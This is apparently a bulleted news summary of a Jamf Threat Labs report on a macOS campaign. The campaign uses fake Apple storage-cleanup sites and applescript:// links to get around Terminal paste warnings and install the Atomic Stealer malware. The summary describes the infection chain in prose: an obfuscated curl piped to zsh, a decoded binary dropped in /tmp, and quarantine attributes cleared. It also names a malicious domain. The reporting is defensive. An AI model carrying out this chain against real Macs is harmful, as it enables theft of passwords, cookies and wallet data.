Overview
- Jamf Threat Labs, which published its findings Wednesday, detailed an active campaign that uses Apple‑themed “storage cleanup” sites to launch Script Editor via an applescript:// link.
- The webpage’s “Execute” button triggers a browser prompt to open Script Editor with pre‑filled code, a switch that sidesteps macOS 26.4’s new paste‑scan warnings in Terminal.
- Once opened, the script runs an obfuscated curl piped to zsh that decodes a base64‑and‑gzip blob, drops a Mach‑O file in /tmp, clears its security attributes, makes it executable, and runs it.
- Jamf identified the final payload as Atomic Stealer, malware that can grab Keychain items, browser wallet data, autofill details, passwords, cookies, and other sensitive files from a Mac.
- Jamf shared indicators such as the dryvecar[.]com domain and urged users to treat Script Editor prompts from webpages as high‑risk, a gap that could push Apple to tighten browser‑to‑app URL handling.